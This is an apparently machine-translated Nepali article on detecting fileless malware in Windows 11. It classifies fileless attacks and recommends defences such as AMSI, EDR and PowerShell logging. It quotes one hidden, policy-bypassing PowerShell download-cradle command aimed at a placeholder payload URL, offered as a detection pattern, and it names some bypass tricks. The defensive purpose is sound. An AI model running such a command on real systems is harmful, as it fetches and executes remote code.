Windows 11 मा खतरनाक फाइललेस मालवेयर कसरी पत्ता लगाउने

¿खतरनाक फाइललेस मालवेयर कसरी पत्ता लगाउने? फाइललेस आक्रमण गतिविधि उल्लेखनीय रूपमा बढेको छ, र यसले कुरालाई अझ खराब बनाएको छ, विन्डोज ११ अछुतो छैनयो दृष्टिकोणले डिस्कलाई बाइपास गर्छ र मेमोरी र वैध प्रणाली उपकरणहरूमा निर्भर गर्दछ; त्यसैले हस्ताक्षर-आधारित एन्टिभाइरस प्रोग्रामहरू संघर्ष गर्छन्। यदि तपाईं यसलाई पत्ता लगाउने भरपर्दो तरिका खोज्दै हुनुहुन्छ भने, उत्तर संयोजनमा निहित छ टेलिमेट्री, व्यवहार विश्लेषण, र विन्डोज नियन्त्रणहरू.

हालको इकोसिस्टममा, PowerShell, WMI, वा Mshta को दुरुपयोग गर्ने अभियानहरू मेमोरी इन्जेक्सन, डिस्कलाई "नछोइकन" दृढता, र यहाँसम्म कि फर्मवेयर दुरुपयोगमुख्य कुरा भनेको खतराको नक्सा, आक्रमणका चरणहरू, र सबै कुरा RAM भित्र हुँदा पनि तिनीहरूले के संकेतहरू छोड्छन् भनेर बुझ्नु हो।

फाइललेस मालवेयर भनेको के हो र यो विन्डोज ११ मा किन चिन्ताको विषय हो?

जब हामी "फाइललेस" खतराहरूको बारेमा कुरा गर्छौं, हामी दुर्भावनापूर्ण कोडलाई जनाउँछौं जुन तपाईंले नयाँ कार्यान्वयनयोग्यहरू जम्मा गर्नु पर्दैन। सञ्चालन गर्न फाइल प्रणालीमा। यो सामान्यतया चलिरहेको प्रक्रियाहरूमा इन्जेक्ट गरिन्छ र RAM मा कार्यान्वयन गरिन्छ, माइक्रोसफ्टद्वारा हस्ताक्षर गरिएका दोभाषे र बाइनरीहरूमा भर पर्दै (जस्तै, पावरशेल, WMI, rundll32, mshtaयसले तपाईंको पदचिह्न कम गर्छ र तपाईंलाई शंकास्पद फाइलहरू मात्र खोज्ने इन्जिनहरूलाई बाइपास गर्न अनुमति दिन्छ।

आदेशहरू सुरु गर्न कमजोरीहरूको शोषण गर्ने कार्यालय कागजातहरू वा PDF हरूलाई पनि घटनाको अंश मानिन्छ, किनभने मेमोरीमा कार्यान्वयन सक्रिय गर्नुहोस् विश्लेषणको लागि उपयोगी बाइनरीहरू नछोडिकन। को दुरुपयोग म्याक्रो र DDE अफिसमा, किनकि कोड WinWord जस्ता वैध प्रक्रियाहरूमा चल्छ।

आक्रमणकारीहरूले सामाजिक इन्जिनियरिङ (फिसिङ, स्पाम लिङ्कहरू) लाई प्राविधिक जालहरूसँग जोड्छन्: प्रयोगकर्ताको क्लिकले एउटा श्रृंखला सुरु गर्छ जसमा स्क्रिप्टले मेमोरीमा अन्तिम पेलोड डाउनलोड र कार्यान्वयन गर्छ, निशान छोड्नबाट बच्ने डिस्कमा। उद्देश्यहरू डेटा चोरीदेखि लिएर ransomware कार्यान्वयन, मौन पार्श्व आन्दोलन सम्मका छन्।

प्रणालीमा पदचिह्न अनुसार प्रकारहरू: 'शुद्ध' देखि हाइब्रिड सम्म

भ्रामक अवधारणाहरूबाट बच्नको लागि, फाइल प्रणालीसँगको अन्तरक्रियाको डिग्रीद्वारा खतराहरूलाई छुट्याउनु उपयोगी हुन्छ। यो वर्गीकरणले स्पष्ट पार्छ के कायम रहन्छ, कोड कहाँ रहन्छ, र यसले कस्ता संकेतहरू छोड्छ?.

प्रकार I: कुनै फाइल गतिविधि छैन

पूर्ण रूपमा फाइलरहित मालवेयरले डिस्कमा केही पनि लेख्दैन। एउटा उत्कृष्ट उदाहरण भनेको a को शोषण गर्नु हो नेटवर्क जोखिम (जस्तै पहिलेको EternalBlue भेक्टर) कर्नेल मेमोरीमा बस्ने ब्याकडोर कार्यान्वयन गर्न (डबलपल्सर जस्ता केसहरू)। यहाँ, सबै कुरा RAM मा हुन्छ र फाइल प्रणालीमा कुनै कलाकृतिहरू छैनन्।

अर्को विकल्प भनेको दूषित गर्नु हो फर्मवेयर कम्पोनेन्टहरूको संख्या: BIOS/UEFI, नेटवर्क एडेप्टरहरू, USB बाह्य उपकरणहरू (BadUSB-प्रकारका प्रविधिहरू) वा CPU उपप्रणालीहरू पनि। तिनीहरू पुन: सुरु र पुन: स्थापना मार्फत पनि रहन्छन्, थप कठिनाईको साथ जुन थोरै उत्पादनहरूले फर्मवेयर निरीक्षण गर्छन्यी जटिल आक्रमणहरू हुन्, कम बारम्बार हुन्छन्, तर तिनीहरूको लुकेकोपन र टिकाउपनको कारण खतरनाक हुन्छन्।

प्रकार II: अप्रत्यक्ष अभिलेख गतिविधि

यहाँ, मालवेयरले आफ्नै कार्यान्वयनयोग्य "छोड्दैन", तर प्रणाली-व्यवस्थित कन्टेनरहरू प्रयोग गर्दछ जुन अनिवार्य रूपमा फाइलहरूको रूपमा भण्डारण गरिन्छ। उदाहरणका लागि, ब्याकडोरहरू जसले रोप्छ पावरशेल आदेशहरू WMI भण्डारमा र घटना फिल्टरहरू प्रयोग गरेर यसको कार्यान्वयन ट्रिगर गर्नुहोस्। बाइनरीहरू नछोडिकन कमाण्ड लाइनबाट यसलाई स्थापना गर्न सम्भव छ, तर WMI भण्डार डिस्कमा वैध डाटाबेसको रूपमा रहन्छ, जसले प्रणालीलाई असर नगरी सफा गर्न गाह्रो बनाउँछ।

व्यावहारिक दृष्टिकोणबाट तिनीहरूलाई फाइलविहीन मानिन्छ, किनभने त्यो कन्टेनर (WMI, रजिस्ट्री, आदि) यो क्लासिक पत्ता लगाउन सकिने कार्यान्वयनयोग्य होइन। अनि यसको सफाई मामूली कुरा होइन। नतिजा: थोरै "परम्परागत" ट्रेसको साथ गोप्य दृढता।

प्रकार III: काम गर्न फाइलहरू आवश्यक पर्दछ

केही केसहरूले कायम राख्छन् 'फाइलरहित' दृढता तार्किक स्तरमा, तिनीहरूलाई फाइल-आधारित ट्रिगर चाहिन्छ। विशिष्ट उदाहरण कोभ्टर हो: यसले अनियमित विस्तारको लागि शेल क्रिया दर्ता गर्दछ; जब त्यो विस्तार भएको फाइल खोलिन्छ, mshta.exe प्रयोग गरेर एउटा सानो स्क्रिप्ट सुरु हुन्छ, जसले रजिस्ट्रीबाट मालिसियस स्ट्रिङलाई पुनर्निर्माण गर्दछ।

चाल यो हो कि अनियमित विस्तारहरू भएका यी "बाइट" फाइलहरूमा विश्लेषणयोग्य पेलोड हुँदैन, र कोडको ठूलो भाग यसमा रहन्छ। रेकर्ड (अर्को कन्टेनर)। त्यसैले तिनीहरूलाई प्रभावमा फाइललेसको रूपमा वर्गीकृत गरिएको छ, यद्यपि कडा रूपमा भन्नुपर्दा तिनीहरू ट्रिगरको रूपमा एक वा बढी डिस्क कलाकृतिहरूमा निर्भर हुन्छन्।

संक्रमणका वाहक र 'होस्ट': यो कहाँ प्रवेश गर्छ र कहाँ लुक्छ

पत्ता लगाउने क्षमता सुधार गर्न, प्रवेश बिन्दु र संक्रमणको आयोजकको नक्साङ्कन गर्नु महत्त्वपूर्ण छ। यो दृष्टिकोणले डिजाइन गर्न मद्दत गर्छ विशिष्ट नियन्त्रणहरू उपयुक्त टेलिमेट्रीलाई प्राथमिकता दिनुहोस्।

शोषणहरू

• फाइल-आधारित (प्रकार III): कागजातहरू, कार्यान्वयनयोग्यहरू, लिगेसी फ्ल्यास/जाभा फाइलहरू, वा LNK फाइलहरूले शेलकोडलाई मेमोरीमा लोड गर्न ब्राउजर वा तिनीहरूलाई प्रशोधन गर्ने इन्जिनको शोषण गर्न सक्छन्। पहिलो भेक्टर फाइल हो, तर पेलोड RAM मा जान्छ।
• नेटवर्कमा आधारित (प्रकार I): जोखिमको शोषण गर्ने प्याकेज (जस्तै, SMB मा) ले प्रयोगकर्ताल्याण्ड वा कर्नेलमा कार्यान्वयन प्राप्त गर्दछ। WannaCry ले यो दृष्टिकोणलाई लोकप्रिय बनायो। प्रत्यक्ष मेमोरी लोड नयाँ फाइल बिना।

हार्डवेयर

• उपकरणहरू (प्रकार I): डिस्क वा नेटवर्क कार्ड फर्मवेयर परिवर्तन गर्न सकिन्छ र कोड परिचय गर्न सकिन्छ। निरीक्षण गर्न गाह्रो हुन्छ र OS बाहिर रहन्छ।
• CPU र व्यवस्थापन उपप्रणालीहरू (प्रकार I): इन्टेलको ME/AMT जस्ता प्रविधिहरूले मार्गहरू प्रदर्शन गरेका छन् OS बाहिर नेटवर्किङ र कार्यान्वयनयसले धेरै कम स्तरमा आक्रमण गर्छ, उच्च सम्भाव्यता भएको चोरीको साथ।
• युएसबी (प्रकार I): BadUSB ले तपाईंलाई किबोर्ड वा NIC को प्रतिरूपण गर्न र आदेशहरू सुरु गर्न वा ट्राफिक रिडिरेक्ट गर्न USB ड्राइभलाई पुन: प्रोग्राम गर्न अनुमति दिन्छ।
• BIOS/UEFI (प्रकार I): विन्डोज सुरु हुनुभन्दा पहिले चल्ने खराब फर्मवेयर रिप्रोग्रामिङ (मेब्रोमी जस्ता केसहरू)।
• हाइपरभाइजर (प्रकार I): OS को उपस्थिति लुकाउन यसको मुनि मिनी-हाइपरभाइजर लागू गर्ने। दुर्लभ, तर हाइपरभाइजर रुटकिट्सको रूपमा पहिले नै अवलोकन गरिएको।

कार्यान्वयन र इंजेक्शन

• फाइल-आधारित (प्रकार III): EXE/DLL/LNK वा निर्धारित कार्यहरू जसले वैध प्रक्रियाहरूमा इन्जेक्सन सुरु गर्दछ।
• म्याक्रोहरू (प्रकार III): अफिसमा VBA ले प्रयोगकर्ताको सहमतिमा छलकपट मार्फत पूर्ण ransomware सहित पेलोडहरू डिकोड र कार्यान्वयन गर्न सक्छ।
• लिपिहरू (प्रकार II): फाइल, कमाण्ड लाइनबाट PowerShell, VBScript वा JScript, सेवाहरू, दर्ता वा WMIआक्रमणकारीले डिस्क नछोइकन टाढाको सत्रमा स्क्रिप्ट टाइप गर्न सक्छ।
• बुट रेकर्ड (MBR/बुट) (प्रकार II): पेट्या जस्ता परिवारहरूले स्टार्टअपमा नियन्त्रण लिन बुट सेक्टरलाई ओभरराइट गर्छन्। यो फाइल प्रणाली बाहिर छ, तर OS र यसलाई पुनर्स्थापित गर्न सक्ने आधुनिक समाधानहरूमा पहुँचयोग्य छ।

फाइलरहित आक्रमणहरू कसरी सञ्चालन हुन्छन्: चरणहरू र संकेतहरू

यद्यपि तिनीहरूले कार्यान्वयनयोग्य फाइलहरू छोड्दैनन्, अभियानहरूले चरणबद्ध तर्क पछ्याउँछन्। तिनीहरूलाई बुझ्नाले अनुगमनको लागि अनुमति दिन्छ। घटनाहरू र प्रक्रियाहरू बीचको सम्बन्ध जसले छाप छोड्छ।

• प्रारम्भिक पहुँचलिङ्क वा संलग्नकहरू, सम्झौता गरिएका वेबसाइटहरू, वा चोरी गरिएका प्रमाणहरू प्रयोग गरेर फिसिङ आक्रमणहरू। धेरै चेनहरू अफिस कागजातबाट सुरु हुन्छन् जसले आदेश ट्रिगर गर्दछ। पावरशेल.
• दृढता: WMI मार्फत पछाडिको ढोका (फिल्टर र सदस्यताहरू), रजिस्ट्री कार्यान्वयन कुञ्जीहरू वा नयाँ दुर्भावनापूर्ण फाइल बिना स्क्रिप्टहरू पुन: सुरु गर्ने निर्धारित कार्यहरू।
• एक्सफिल्ट्रेसनएकपटक जानकारी सङ्कलन गरिसकेपछि, यसलाई विश्वसनीय प्रक्रियाहरू (ब्राउजरहरू, पावरशेल, बिट्सएडमिन) प्रयोग गरेर ट्राफिक मिश्रण गर्न नेटवर्कबाट बाहिर पठाइन्छ।

यो ढाँचा विशेष गरी कपटी छ किनभने आक्रमण सूचकहरू तिनीहरू सामान्यतामा लुक्छन्: कमाण्ड-लाइन आर्गुमेन्टहरू, प्रक्रिया चेनिङ, असामान्य आउटबाउन्ड जडानहरू, वा इंजेक्शन API हरूमा पहुँच।

सामान्य प्रविधिहरू: मेमोरीदेखि रेकर्डिङसम्म

कलाकारहरू विभिन्न प्रकारका विधिहरू जसले चोरीलाई अनुकूलन गर्छ। प्रभावकारी पत्ता लगाउन सक्रिय गर्न सबैभन्दा सामान्यहरू जान्नु उपयोगी हुन्छ।

• स्मृतिमा बस्ने: सक्रियताको लागि पर्खिरहेको विश्वसनीय प्रक्रियाको ठाउँमा पेलोडहरू लोड गर्दै। रुटकिट र हुकहरू कर्नेलमा, तिनीहरूले लुकाउने स्तर बढाउँछन्।
• रजिस्ट्रीमा निरन्तरताकुञ्जीहरूमा एन्क्रिप्टेड ब्लबहरू बचत गर्नुहोस् र तिनीहरूलाई वैध लन्चर (mshta, rundll32, wscript) बाट पुन: हाइड्रेट गर्नुहोस्। अल्पकालीन स्थापनाकर्ताले यसको फुटप्रिन्ट कम गर्न स्वयं-विनाश गर्न सक्छ।
• क्रेडेन्सियल फिसिङचोरी भएका प्रयोगकर्ता नाम र पासवर्डहरू प्रयोग गरेर, आक्रमणकारीले टाढाका शेलहरू र प्लान्टहरू कार्यान्वयन गर्दछ। मौन पहुँच रजिस्ट्री वा WMI मा।
• 'फाइललेस' र्‍यानसमवेयरइन्क्रिप्शन र C2 सञ्चार RAM बाट व्यवस्थित गरिन्छ, जसले गर्दा क्षति देखिने नभएसम्म पत्ता लगाउने अवसरहरू कम हुन्छन्।
• सञ्चालन किटहरू: प्रयोगकर्ताले क्लिक गरेपछि कमजोरीहरू पत्ता लगाउने र मेमोरी-मात्र पेलोडहरू तैनाथ गर्ने स्वचालित चेनहरू।
• कोड सहितका कागजातहरू: म्याक्रोहरू र DDE जस्ता संयन्त्रहरू जसले कार्यान्वयनयोग्यहरूलाई डिस्कमा बचत नगरी आदेशहरू ट्रिगर गर्दछ।

उद्योग अध्ययनहरूले पहिले नै उल्लेखनीय शिखरहरू देखाइसकेका छन्: २०१८ को एक अवधिमा, एक ९०% भन्दा बढीको वृद्धि स्क्रिप्ट-आधारित र PowerShell चेन आक्रमणहरूमा, यो संकेत हो कि भेक्टर यसको प्रभावकारिताको लागि रुचाइएको छ।

कम्पनीहरू र आपूर्तिकर्ताहरूको लागि चुनौती: किन अवरुद्ध गर्नु पर्याप्त छैन

PowerShell लाई असक्षम पार्नु वा म्याक्रोहरूलाई सदाको लागि प्रतिबन्ध लगाउनु लोभलाग्दो हुनेछ, तर तपाईंले अपरेशन तोड्नुहुनेछपावरशेल आधुनिक प्रशासनको एक स्तम्भ हो र व्यवसायमा कार्यालय आवश्यक छ; आँखा चिम्लेर अवरुद्ध गर्नु प्रायः सम्भव हुँदैन।

यसबाहेक, आधारभूत नियन्त्रणहरू बाइपास गर्ने तरिकाहरू छन्: DLL र rundll32 मार्फत PowerShell चलाउने, EXE हरूमा प्याकेजिङ स्क्रिप्टहरू, PowerShell को आफ्नै प्रतिलिपि ल्याउनुहोस्। वा छविहरूमा स्क्रिप्टहरू लुकाउनुहोस् र तिनीहरूलाई मेमोरीमा निकाल्नुहोस्। त्यसकारण, बचाउ केवल उपकरणहरूको अस्तित्वलाई अस्वीकार गर्ने कुरामा आधारित हुन सक्दैन।

अर्को सामान्य गल्ती भनेको सम्पूर्ण निर्णय क्लाउडलाई सुम्पनु हो: यदि एजेन्टले सर्भरबाट प्रतिक्रियाको लागि पर्खनु पर्यो भने, तपाईंले वास्तविक-समय रोकथाम गुमाउनुहुन्छजानकारीलाई समृद्ध बनाउन टेलिमेट्री डेटा अपलोड गर्न सकिन्छ, तर न्यूनीकरण अन्तिम बिन्दुमा हुनुपर्छ।.

विन्डोज ११ मा फाइललेस मालवेयर कसरी पत्ता लगाउने: टेलिमेट्री र व्यवहार

जित्ने रणनीति भनेको प्रक्रियाहरू र मेमोरी निगरानी गर्नुहोस्फाइलहरू होइनन्। दुर्भावनापूर्ण व्यवहारहरू फाइलले लिने रूपहरू भन्दा बढी स्थिर हुन्छन्, जसले गर्दा तिनीहरूलाई रोकथाम इन्जिनहरूको लागि आदर्श बनाउँछ।

• AMSI (एन्टिमालवेयर स्क्यान इन्टरफेस)यसले PowerShell, VBScript, वा JScript स्क्रिप्टहरूलाई मेमोरीमा गतिशील रूपमा निर्माण गर्दा पनि रोक्छ। कार्यान्वयन गर्नु अघि अस्पष्ट स्ट्रिङहरू क्याप्चर गर्नको लागि उत्कृष्ट।
• प्रक्रिया अनुगमन: सुरु/समाप्त, PID, अभिभावक र बच्चाहरू, मार्गहरू, कमाण्ड लाइनहरू र ह्यासहरू, साथै पूरा कथा बुझ्नको लागि कार्यान्वयन रूखहरू।
• स्मृति विश्लेषण: डिस्कलाई नछोइकन इंजेक्शन, परावर्तक वा PE भारहरूको पहिचान, र असामान्य कार्यान्वयनयोग्य क्षेत्रहरूको समीक्षा।
• स्टार्टर सेक्टर सुरक्षा: छेडछाड भएको अवस्थामा MBR/EFI को नियन्त्रण र पुनर्स्थापना।

माइक्रोसफ्ट इकोसिस्टममा, डिफेन्डर फर एन्डपोइन्टले AMSI लाई संयोजन गर्दछ, व्यवहार अनुगमनमेमोरी स्क्यानिङ र क्लाउड-आधारित मेसिन लर्निङ नयाँ वा अस्पष्ट भेरियन्टहरू विरुद्ध पत्ता लगाउन मापन गर्न प्रयोग गरिन्छ। अन्य विक्रेताहरूले कर्नेल-निवासी इन्जिनहरूसँग समान दृष्टिकोणहरू प्रयोग गर्छन्।

सहसम्बन्धको यथार्थपरक उदाहरण: कागजातबाट PowerShell सम्म

कल्पना गर्नुहोस् एउटा श्रृंखला जहाँ आउटलुकले एट्याचमेन्ट डाउनलोड गर्छ, वर्डले कागजात खोल्छ, सक्रिय सामग्री सक्षम पारिएको हुन्छ, र PowerShell शंकास्पद प्यारामिटरहरूसँग सुरु हुन्छ। उचित टेलिमेट्रीले देखाउनेछ कमाण्ड लाइन (जस्तै, ExecutionPolicy Bypass, लुकेको विन्डो), अविश्वसनीय डोमेनमा जडान गर्ने र AppData मा आफैं स्थापना हुने चाइल्ड प्रक्रिया सिर्जना गर्ने।

स्थानीय सन्दर्भ भएको एजेन्ट सक्षम छ रोक्नुहोस् र उल्टाउनुहोस् SIEM लाई सूचित गर्नुका साथै वा इमेल/SMS मार्फत म्यानुअल हस्तक्षेप बिना नै दुर्भावनापूर्ण गतिविधि। केही उत्पादनहरूले मूल कारण विशेषता तह (स्टोरीलाइन-प्रकारका मोडेलहरू) थप्छन्, जसले दृश्य प्रक्रिया (आउटलुक/वर्ड) लाई होइन, तर पूर्ण दुर्भावनापूर्ण थ्रेड र यसको उत्पत्ति प्रणालीलाई व्यापक रूपमा सफा गर्नको लागि हो।

हेर्नुपर्ने एउटा सामान्य आदेश ढाँचा यस्तो देखिन सक्छ: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');तर्क भनेको सटीक स्ट्रिङ होइन, तर संकेतहरूको सेट: नीति बाइपास, लुकेको विन्डो, स्पष्ट डाउनलोड, र इन-मेमोरी कार्यान्वयन।

AMSI, पाइपलाइन र प्रत्येक अभिनेताको भूमिका: अन्तिम बिन्दुदेखि SOC सम्म

स्क्रिप्ट क्याप्चरभन्दा बाहिर, एक बलियो वास्तुकलाले अनुसन्धान र प्रतिक्रियालाई सहज बनाउने चरणहरू व्यवस्थित गर्दछ। लोड कार्यान्वयन गर्नु अघि जति धेरै प्रमाणहरू हुन्छन्, त्यति नै राम्रो।, अझ राम्रो।

• स्क्रिप्ट अवरोधAMSI ले मालवेयर पाइपलाइनमा स्थिर र गतिशील विश्लेषणको लागि सामग्री (यदि यो उडानमा उत्पन्न गरिएको भए पनि) प्रदान गर्दछ।
• प्रक्रिया घटनाहरूPID, बाइनरी, ह्यास, रुट र अन्य डेटा सङ्कलन गरिन्छ। तर्कहरू, अन्तिम लोडमा पुर्‍याउने प्रक्रिया रूखहरू स्थापना गर्दै।
• पत्ता लगाउने र रिपोर्ट गर्नेपत्ता लगाइएका कुराहरू उत्पादन कन्सोलमा प्रदर्शित हुन्छन् र अभियान दृश्यावलोकनको लागि नेटवर्क प्लेटफर्महरू (NDR) मा पठाइन्छ।
• प्रयोगकर्ता ग्यारेन्टीहरूयदि स्क्रिप्ट मेमोरीमा इन्जेक्ट गरिएको छ भने पनि, फ्रेमवर्क AMSI ले यसलाई रोक्छ विन्डोजको उपयुक्त संस्करणहरूमा।
• प्रशासक क्षमताहरू: स्क्रिप्ट निरीक्षण सक्षम पार्न नीति कन्फिगरेसन, व्यवहार-आधारित अवरुद्ध र कन्सोलबाट रिपोर्टहरू सिर्जना गर्दै।
• सामाजिक कार्य: इतिहास पुन: सिर्जना गर्न कलाकृतिहरूको निकासी (VM UUID, OS संस्करण, स्क्रिप्ट प्रकार, इनिसिएटर प्रक्रिया र यसको अभिभावक, ह्यास र कमाण्ड लाइनहरू) र लिफ्ट नियमहरू भविष्य।

जब प्लेटफर्मले निर्यात गर्न अनुमति दिन्छ मेमोरी बफर कार्यान्वयनसँग सम्बन्धित, अनुसन्धानकर्ताहरूले नयाँ पत्ता लगाउन सक्छन् र समान भेरियन्टहरू विरुद्धको प्रतिरक्षालाई समृद्ध बनाउन सक्छन्।

विन्डोज ११ मा व्यावहारिक उपायहरू: रोकथाम र शिकार

मेमोरी निरीक्षण र AMSI सँग EDR हुनुको साथै, Windows 11 ले तपाईंलाई आक्रमण स्थानहरू बन्द गर्न र दृश्यता सुधार गर्न दिन्छ नेटिभ नियन्त्रणहरू.

• PowerShell मा दर्ता र प्रतिबन्धहरूस्क्रिप्ट ब्लक लगिङ र मोड्युल लगिङ सक्षम पार्छ, सम्भव भएसम्म प्रतिबन्धित मोडहरू लागू गर्छ, र प्रयोग नियन्त्रण गर्छ बाइपास/लुकेको.
• आक्रमण सतह न्यूनीकरण (ASR) नियमहरू: अफिस प्रक्रियाहरूद्वारा स्क्रिप्ट सुरुवातहरूलाई रोक्छ र WMI दुरुपयोग/PSExec आवश्यक नभएको बेला।
• कार्यालय म्याक्रो नीतिहरू: पूर्वनिर्धारित रूपमा, आन्तरिक म्याक्रो साइनिङ र कडा विश्वास सूचीहरू असक्षम पार्छ; लिगेसी DDE प्रवाहहरूको निगरानी गर्दछ।
• WMI लेखा परीक्षण र रजिस्ट्री: घटना सदस्यताहरू र स्वचालित कार्यान्वयन कुञ्जीहरू (रन, रनओन्स, विनलगन), साथै कार्य सिर्जनाको निगरानी गर्दछ। तालिकाबद्ध.
• सुरुवात सुरक्षा: सुरक्षित बुट सक्रिय गर्दछ, MBR/EFI अखण्डता जाँच गर्दछ र स्टार्टअपमा कुनै परिमार्जनहरू नभएको प्रमाणित गर्दछ।
• प्याचिङ र कडाइ: ब्राउजरहरू, अफिस कम्पोनेन्टहरू, र नेटवर्क सेवाहरूमा शोषणयोग्य कमजोरीहरू बन्द गर्दछ।
• जागरूकता: प्रयोगकर्ताहरू र प्राविधिक टोलीहरूलाई फिसिङ र सिग्नलहरूमा तालिम दिन्छ गोप्य मृत्युदण्ड.

शिकारको लागि, निम्न बारे प्रश्नहरूमा ध्यान केन्द्रित गर्नुहोस्: PowerShell/MSHTA तर्फ कार्यालयद्वारा प्रक्रियाहरू सिर्जना गर्ने, सँग तर्कहरू डाउनलोडस्ट्रिङ/डाउनलोडफाइलस्पष्ट अस्पष्टता, परावर्तक इंजेक्शनहरू, र शंकास्पद TLD हरूमा आउटबाउन्ड नेटवर्कहरू भएका स्क्रिप्टहरू। आवाज कम गर्न प्रतिष्ठा र आवृत्तिसँग यी संकेतहरूलाई क्रस-रेफरन्स गर्नुहोस्।

आज प्रत्येक इन्जिनले के पत्ता लगाउन सक्छ?

माइक्रोसफ्टको इन्टरप्राइज समाधानहरूले AMSI, व्यवहारिक विश्लेषण, स्मृति जाँच गर्नुहोस् र बुट सेक्टर सुरक्षा, साथै उदीयमान खतराहरू विरुद्ध मापन गर्न क्लाउड-आधारित ML मोडेलहरू। अन्य विक्रेताहरूले परिवर्तनहरूको स्वचालित रोलब्याकको साथ दुर्भावनापूर्ण र सौम्य सफ्टवेयर छुट्याउन कर्नेल-स्तर अनुगमन लागू गर्छन्।

मा आधारित दृष्टिकोण मृत्युदण्डका कथाहरू यसले तपाईंलाई मूल कारण पहिचान गर्न अनुमति दिन्छ (उदाहरणका लागि, आउटलुक संलग्नक जसले चेन ट्रिगर गर्दछ) र सम्पूर्ण रूखलाई कम गर्दछ: स्क्रिप्टहरू, कुञ्जीहरू, कार्यहरू, र मध्यवर्ती बाइनरीहरू, देखिने लक्षणमा अड्किनबाट बच्न।

सामान्य गल्तीहरू र त्यसबाट कसरी बच्ने

वैकल्पिक व्यवस्थापन योजना बिना पावरशेललाई रोक्नु अव्यावहारिक मात्र होइन, तर त्यहाँ पनि छन् अप्रत्यक्ष रूपमा यसलाई बोलाउने तरिकाहरूम्याक्रोहरूमा पनि यही कुरा लागू हुन्छ: या त तपाईंले तिनीहरूलाई नीतिहरू र हस्ताक्षरहरूद्वारा व्यवस्थापन गर्नुहोस्, नत्र व्यवसायलाई नोक्सान हुनेछ। टेलिमेट्री र व्यवहार नियमहरूमा ध्यान केन्द्रित गर्नु राम्रो हुन्छ।

अर्को सामान्य गल्ती भनेको एप्लिकेसनहरूलाई ह्वाइटलिस्ट गर्नाले सबै कुरा समाधान हुन्छ भन्ने विश्वास गर्नु हो: फाइलरहित प्रविधि यसमा ठ्याक्कै निर्भर गर्दछ। विश्वसनीय अनुप्रयोगहरूनियन्त्रणले उनीहरूलाई अनुमति छ कि छैन भनेर मात्र नभई उनीहरूले के गर्छन् र कसरी सम्बन्धित छन् भनेर हेर्नुपर्छ।

माथिका सबै कुराहरूसँगै, फाइललेस मालवेयर "भूत" हुन छोड्छ जब तपाईं वास्तवमा के महत्त्वपूर्ण छ भनेर निगरानी गर्नुहुन्छ: व्यवहार, स्मृति र उत्पत्ति प्रत्येक कार्यान्वयनको। AMSI, रिच प्रोसेस टेलिमेट्री, नेटिभ विन्डोज ११ नियन्त्रणहरू, र व्यवहारिक विश्लेषणको साथ EDR तह संयोजन गर्नाले तपाईंलाई फाइदा हुन्छ। समीकरणमा म्याक्रो र पावरशेल, WMI/रजिस्ट्री अडिटिङ, र शिकारको लागि यथार्थवादी नीतिहरू थप्नुहोस् जसले कमाण्ड लाइनहरू र प्रक्रिया रूखहरूलाई प्राथमिकता दिन्छ, र तपाईंसँग एउटा रक्षा छ जसले यी चेनहरूलाई आवाज निकाल्नु अघि नै काट्छ।